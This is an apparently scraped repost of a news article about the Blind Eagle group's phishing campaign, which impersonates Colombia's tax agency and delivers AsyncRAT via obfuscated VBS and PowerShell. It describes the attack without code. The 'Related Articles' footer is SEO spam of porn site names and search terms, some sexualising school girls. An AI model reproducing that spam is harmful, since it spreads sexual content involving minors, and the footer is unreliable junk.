Home Security Blind Eagle Hackers Goal Key Industries in Colombia

Blind Eagle Hackers Goal Key Industries in Colombia

by crpt os


Feb 28, 2023Ravie LakshmananCyber Threat / Malware

The threat actor known as Blind Eagle has been linked to a new campaign targeting various key industries in Colombia.

The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group’s victimology footprint.

Targeted entities include health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in Colombia, the Canadian cybersecurity company said.

Blind Eagle, also known as APT-C-36, was recently covered by Check Point Research, detailing the adversary’s advanced toolset comprising Meterpreter payloads that are delivered via spear-phishing emails.

The latest set of attacks involves the group impersonating the Colombian government tax agency, the National Directorate of Taxes and Customs (DIAN), to phish its targets using lures that urge recipients to settle “outstanding obligations.”

The craftily designed email messages come with a link pointing to a PDF file that’s purportedly hosted on DIAN’s website, but actually deploys malware on the targeted system, effectively launching the infection chain.

“The fake DIAN website page contains a button that encourages the victim to download a PDF to view what the site claims to be pending tax invoices,” BlackBerry researchers said.

Blind Eagle

“Clicking the blue button initiates the download of a malicious file from the Discord content delivery network (CDN), which the attackers are abusing in this phishing scam.”

The payload is an obfuscated Visual Basic Script (VBS), which gets executed upon opening the “PDF” file and utilizes PowerShell to retrieve a .NET-based DLL file that ultimately loads AsyncRAT into memory.

“A malicious [remote access trojan] installed on a victim’s machine enables the threat actor to connect to the infected endpoint any time they like, and to perform any operations they desire,” the researchers said.

Is Your Business Prepared for the Top SaaS 🛡️ Security Challenges of 2023? Learn How to Tackle Them – Join Our Webinar Now!

Also of note is the threat actor’s use of dynamic DNS services like DuckDNS to remotely commandeer the compromised hosts.

Blind Eagle is suspected to be a Spanish-speaking group owing to the use of the language in its spear-phishing emails. However, it’s currently unclear where the threat actor is based and whether their attacks are motivated by espionage or financial gain.

“The modus operandi used has mostly stayed the same as the group’s previous efforts – it is very simple, which may mean that this group is comfortable with its way of launching campaigns via phishing emails, and feels confident in using them because they continue to work,” BlackBerry said.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.





Source link

Related Articles

xxxanti beeztube.mobi hot sexy mp4 menyoujan hentaitgp.net jason voorhees hentai indian soft core chupatube.net youjzz ez2 may 8 2023 pinoycinema.org ahensya ng pamahalaan pakistani chut ki chudai pimpmovs.com www xvedio dost ke papa zztube.mobi 300mbfilms.in صور مص الزب arabporna.net نهر العطش لمن تشعر بالحرمان movierulz plz.in bustyporntube.info how to make rangoli video 穂高ゆうき simozo.net 四十路五十路 ロシアav javvideos.net 君島みお 無修正 افلام سكس في المطبخ annarivas.net فيلم سكس قديم rashmi hot videos porncorn.info audiosexstories b grade latest nesaporn.pro high school girls sex videos real life cam eroebony.info painfull porn exbii adult pics teacherporntrends.com nepali school sex